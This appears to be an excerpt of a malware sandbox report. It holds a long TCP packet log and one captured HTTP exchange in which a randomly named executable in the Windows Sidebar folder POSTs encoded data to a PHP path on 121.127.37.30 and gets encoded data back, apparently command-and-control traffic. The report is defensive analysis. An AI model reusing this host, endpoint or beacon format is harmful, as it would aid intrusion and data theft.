                                                Dec 5, 2024 16:03:44.541220903 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.541449070 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.541467905 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.541511059 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.541557074 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.541639090 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.661326885 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.893690109 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:45.013681889 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.013766050 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.013819933 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.868026018 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.909198999 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.100414038 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.143565893 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217713118 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217766047 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217811108 CET4991980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217853069 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.218477011 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.338344097 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.339021921 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.339222908 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.459088087 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.690880060 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.811714888 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.811734915 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.811745882 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:47.664349079 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:47.721748114 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:47.896100998 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:47.940437078 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.015037060 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.015355110 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.135059118 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.135171890 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.135325909 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.135384083 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.135400057 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.255501032 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.487426043 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.607309103 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.607335091 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.607347012 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.160351992 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.160505056 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.280328989 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.280406952 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.280567884 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.281559944 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.281635046 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.281877995 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.400324106 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.401684999 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.401798964 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.401921034 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.521748066 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.628051996 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.747869968 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.747919083 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.753077030 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.872946024 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.873048067 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.873083115 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.686480999 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.737390995 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:50.869203091 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.909203053 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:50.920602083 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.971699953 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.019151926 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.019217968 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.108361006 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.159276962 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.236972094 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.237060070 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.237540960 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357316017 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.357331991 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.357379913 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357434034 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357625961 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357960939 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.358036041 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.477436066 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.706182957 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.826185942 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.826200008 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.826271057 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:52.676578045 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:52.721707106 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:52.985109091 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.034465075 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.113599062 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.113804102 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.233541012 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.233623981 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.233771086 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.233819962 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.233935118 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.354592085 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.581221104 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.701767921 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.701785088 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.701863050 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:54.595108032 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:54.643574953 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:54.832226992 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:54.877962112 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:54.954582930 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:54.954956055 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.074800014 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.074872971 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.074924946 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.074975014 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.075115919 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.194963932 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.424959898 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.545358896 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.545545101 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.545628071 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.925674915 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.925685883 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.045703888 CET8050011121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.049139977 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.049196959 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.049314976 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.088430882 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.088839054 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.089248896 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.169054985 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.169070005 CET8050011121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.169157982 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.169380903 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.289166927 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.395211935 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.515254974 CET8050011121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.515305042 CET8050011121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.519203901 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.639214993 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.639300108 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:56.639473915 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.375293970 CET8050011121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.424860001 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.500520945 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.549849987 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.608352900 CET8050011121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.661149025 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.736330986 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.785161018 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.863708973 CET5001880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.863711119 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.863713026 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.983906984 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.984143019 CET8050011121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.984249115 CET5001880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.984251022 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.984463930 CET5001880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:57.984682083 CET8050012121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:57.984940052 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:58.104804039 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:58.331367970 CET5001880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:58.516530991 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:58.516544104 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:58.516552925 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:59.305738926 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:59.346729040 CET5001880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:59.543287992 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:59.597141027 CET5001880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:59.673136950 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:59.794781923 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:59.795341015 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:59.795341015 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:59.915488958 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:00.145144939 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:00.265214920 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:00.265324116 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:00.265340090 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:01.242125034 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:01.284260035 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:01.476268053 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:01.518630028 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:01.592703104 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:01.593142986 CET5002980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:01.712683916 CET8050024121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:01.712848902 CET8050029121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:01.712944031 CET5002480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:01.713007927 CET5002980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:01.713241100 CET5002980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:01.834402084 CET8050029121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.069159985 CET5002980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.189640999 CET8050029121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.189663887 CET8050029121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.189798117 CET8050029121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.631428957 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.631899118 CET5002980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.751391888 CET8050031121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.751434088 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.751496077 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.751642942 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.751952887 CET8050029121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.752017021 CET5002980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.871543884 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.871566057 CET8050031121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:02.871639013 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.871788025 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:02.991653919 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:03.096868992 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:03.216789007 CET8050031121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:03.216917992 CET8050031121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:03.221817970 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:03.342010021 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:03.342025042 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:03.342171907 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.076395988 CET8050031121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.127990007 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.191463947 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.237365007 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.312241077 CET8050031121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.362368107 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.424211025 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.455785036 CET8050018121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.455852032 CET5001880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.471766949 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.546396017 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.546595097 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.546796083 CET5003880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.666487932 CET8050031121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.666528940 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.666552067 CET5003180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.666601896 CET5003880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.666766882 CET5003880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.666985035 CET8050032121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:04.667041063 CET5003280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:04.786406040 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:05.018726110 CET5003880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:05.138679028 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:05.138694048 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:05.138706923 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:05.986280918 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:06.037152052 CET5003880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:06.224277020 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:06.268640041 CET5003880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:06.356424093 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:06.476166964 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:06.476284981 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:06.476505995 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:06.596260071 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:06.831218958 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:06.951080084 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:06.951092005 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:06.951103926 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:07.798830986 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:07.847182989 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.032321930 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:08.081166983 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.155143023 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.155143023 CET5004980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.275285006 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:08.275417089 CET5004980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.275660038 CET5004980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.275701046 CET8050043121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:08.276324034 CET5004380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.395412922 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:08.628185987 CET5004980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:08.748128891 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:08.748148918 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:08.748192072 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:09.626641035 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:09.674885035 CET5004980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:09.860270023 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:09.911887884 CET5004980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:11.013181925 CET8050038121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:11.013240099 CET5003880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:04:14.652420044 CET8050049121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:04:14.652496099 CET5004980192.168.2.7121.127.37.30

                                                HTTP Request Dependency Graph

                                                • 121.127.37.30

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749724121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:20.243160963 CET470OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 344
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:20.637315035 CET344OUTData Raw: 00 05 04 0d 06 00 01 0a 05 06 02 01 02 01 01 05 00 0b 05 00 02 05 03 0b 02 04 0c 0c 04 57 01 02 0f 05 06 5c 03 54 04 0a 0e 06 07 05 07 57 06 06 05 05 0e 0a 0a 01 06 55 05 07 04 0c 06 05 07 0c 00 57 0c 09 05 02 06 03 0e 03 0e 50 0f 07 0e 02 04 03
                                                Data Ascii: W\TWUWPZ[P\L~@~prOcbawehBhlT^c_p`{|dY{`vDCRwYZu~V@{SP}b}
                                                Dec 5, 2024 16:02:21.555372000 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:22.026050091 CET1236INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:21 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 1364
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 56 4a 7d 5f 78 0b 67 00 7b 5b 78 01 6b 62 7f 49 7d 01 6c 53 7f 4e 5c 50 6d 4d 55 5d 69 62 70 02 76 70 7e 55 7b 72 62 5f 76 48 7f 58 6a 61 78 01 55 4b 72 51 77 5c 7c 5a 7d 71 79 05 68 59 54 0a 78 76 52 09 7e 5d 55 49 62 5c 7d 06 77 61 61 48 6b 71 7a 01 7d 52 7c 08 7f 67 77 02 76 76 7b 06 7c 5c 7d 05 7c 60 79 01 78 64 70 07 6f 59 52 42 7b 7d 74 5b 78 72 5d 5d 7b 60 7e 02 7c 59 70 01 6f 49 74 02 6a 5c 55 4f 77 62 7c 49 7a 51 41 5b 6b 5e 6b 55 6b 62 65 0d 76 52 5e 05 6c 0a 77 58 60 06 7e 40 6e 5f 76 58 7e 7c 62 41 78 61 71 59 62 5d 5d 02 76 5f 5e 4c 63 61 50 50 7e 5d 7a 06 77 61 7d 07 61 66 6f 50 7f 6f 76 5d 77 7c 7f 5d 7f 70 7c 07 78 6c 60 5a 6c 5e 66 00 7c 6d 60 08 77 59 6f 5f 7e 62 5f 50 7e 6e 7c 55 7b 54 7e 02 6a 71 61 05 7b 5d 46 51 68 6c 74 0b 7d 63 7b 53 6a 59 5b 5f 6f 6d 63 07 6f 5b 63 5a 6b 5f 70 5f 6a 01 7f 4f 68 63 65 40 6e 5a 7f 5c 69 62 63 58 60 5d 7d 51 7b 5c 79 44 76 76 78 00 7c 76 70 06 7f 76 5b 0c 74 62 6b 4a 7c 62 53 07 7c 49 76 08 79 76 5a 42 7e 63 73 00 75 5c 5b 41 76 71 53 01 7c 71 [TRUNCATED]
                                                Data Ascii: VJ}_xg{[xkbI}lSN\PmMU]ibpvp~U{rb_vHXjaxUKrQw\|Z}qyhYTxvR~]UIb\}waaHkqz}R|gwvv{|\}|`yxdpoYRB{}t[xr]]{`~|YpoItj\UOwb|IzQA[k^kUkbevR^lwX`~@n_vX~|bAxaqYb]]v_^LcaPP~]zwa}afoPov]w|]p|xl`Zl^f|m`wYo_~b_P~n|U{T~jqa{]FQhlt}c{SjY[_omco[cZk_p_jOhce@nZ\ibcX`]}Q{\yDvvx|vpv[tbkJ|bS|IvyvZB~csu\[AvqS|q~}RVwkv_Y{\aI~pS{YtN{g`{S{ybtF{cb`l{YtI}bsuadG||Q|wR__vR`{R`FvprAzOaG}BbNxavuMsuOdwavN|pjvbiu[hB~l}wRR|MZD{lJ{pfJ}tvwhbP|m]{}v}\uM}`tBlR~`|B}Y~{}gxrpHqkD}IQA|NuAz]R~L|ws}zqiDvfpE}fx~fuvbQ}baOIjxHRB|scIubutOuGqr~Bp~Ywvqgxba|`[DxwhLxwtL{SgHyL`{M~{]NZoI]Z}qg@uX|jop^}gt}anSblNx|tsmTnb}J|of_z\y\}b`g{ZL~Jx^a]w\}bu^Ak|aL`R\h]^xRx^zcu^S`Nwd`L}LnBzSYQc~`Sqb_VsgOQUSjlBjkuD|PEZ{axFkaV[~t|Tksu@{sZasYc`jRmbfXaf{[~|NiXSQvXAZhfCQtKlUMkx\[nnZZiY~\z|Rd|YwJuLIx\_Ywr]ldCT{o[WnWnYPd~{__RJwiQ|Eq\BYi`DQtIhXL`sZo]G[]~}^\WAqlWyCq^AZbc@ZrOk_BarYbUNSS~Ccl\~^s|akA|YW_P{J]d]FRZAinRHW
                                                Dec 5, 2024 16:02:22.026154041 CET357INData Raw: 79 69 61 01 5b 7b 5e 5e 51 66 55 6f 0a 79 72 5d 4e 50 5e 44 5d 79 7a 78 5d 6c 61 08 46 53 7d 64 5d 52 64 03 5e 68 06 09 09 56 59 6b 4c 55 63 7b 47 63 70 65 51 7b 5c 7a 65 6d 4b 78 41 7a 5f 55 5b 52 01 7a 4b 5d 61 56 43 50 5a 09 5f 50 00 65 4c 52
                                                Data Ascii: yia[{^^QfUoyr]NP^D]yzx]laFS}d]Rd^hVYkLUc{GcpeQ{\zemKxAz_U[RzK]aVCPZ_PeLRzsgZtDbeqpYnEPma]j{wmTttbmYyur^icDT{oZWdSoDSqYDo`cXl`|z]uq\BYi`DQtIhXL`w@WVcA[YaLPpXQof_z\y~Z|Yvwt[ba@Pc}_p_O\boNRHcU@iA[RZQca_{SVPww
